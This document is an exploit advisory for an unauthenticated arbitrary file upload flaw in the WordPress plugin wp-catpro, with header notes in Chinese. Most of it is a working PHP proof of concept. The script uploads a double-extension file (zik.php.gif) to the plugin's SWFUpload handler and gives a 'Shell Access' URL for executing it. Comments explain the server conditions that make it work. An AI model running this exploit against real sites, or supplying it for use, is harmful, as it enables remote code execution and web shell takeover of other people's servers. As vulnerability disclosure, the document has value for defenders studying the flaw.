WordPress plugin wp-catpro - Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------
作者 => Zikou-16
邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####
#=> Exploit 信息:
------------------
# 攻击者可以上传 file/shell.php.gif（注意：上传后的 .php.gif 是否会被当作 PHP 执行取决于 Web 服务器配置——例如 Apache 通过 AddHandler 把 php 处理器映射到扩展名时，带双扩展名的文件也会被执行；若服务器不是这样配置，该文件只会作为图片返回，不能得到 shell。）
# ("jpg", "gif", "png") // Allowed file extensions（从 PoC 的效果看，这里只比较文件名最后一个扩展名，因此 shell.php.gif 能通过白名单检查）
# "/uploads/"; // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)（允许字符中包含 `.`，所以双扩展名不会被这条规则过滤掉）
------------------
#=> Exploit
-----------
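<?php
// PoC: POST a file straight to the SWFUpload handler bundled with wp-catpro.
// The request carries no WordPress cookies or nonce, so a successful upload
// indicates the handler performs no authentication or capability check.
//
// The handler's extension allow-list is (jpg, gif, png). A name such as
// zik.php.gif ends in ".gif" and so passes that check while still carrying a
// ".php" segment. Whether the stored file is then *executed* as PHP depends on
// the web server: Apache with an AddHandler-style php mapping runs files with
// a ".php" anywhere in the name; other configurations simply serve it as an
// image. Confirm the target's handler configuration before calling this a shell.
$uploadfile = "zik.php.gif";   // local file to upload; its contents are the PHP payload
$target     = "http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php";

if (!is_file($uploadfile)) {
    fwrite(STDERR, "local payload file not found: $uploadfile\n");
    exit(1);
}

$ch = curl_init($target);
curl_setopt($ch, CURLOPT_POST, true);

// The legacy "@filename" upload syntax was disabled by CURLOPT_SAFE_UPLOAD in
// PHP 5.6 and removed in PHP 7; use CURLFile where available and only fall
// back to the "@" form on older interpreters.
$filedata = class_exists('CURLFile') ? new CURLFile($uploadfile) : "@$uploadfile";

curl_setopt($ch, CURLOPT_POSTFIELDS, array(
    'Filedata' => $filedata,
    // Destination directory is supplied by the client. The handler appears to
    // use it as given (the stored file lands under this path) — presumably
    // without server-side validation; verify against the plugin source.
    'folder'   => '/wp-content/uploads/catpro/',
));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$postResult = curl_exec($ch);
if ($postResult === false) {
    // Distinguish a transport failure from an empty or error response body.
    fwrite(STDERR, "curl error: " . curl_error($ch) . "\n");
} else {
    print "HTTP " . curl_getinfo($ch, CURLINFO_HTTP_CODE) . "\n";
    print "$postResult";   // response body; presumably reveals the stored file name
}
curl_close($ch);

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
// (the handler renames the file on disk; take the actual name from the response above)
?>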
<?php
// Contents of the uploaded file (zik.php.gif). phpinfo() is used only as a
// harmless proof that the server executed the file as PHP; if the upload is
// merely served back as an image, this source is returned verbatim instead.
phpinfo(INFO_ALL);
?>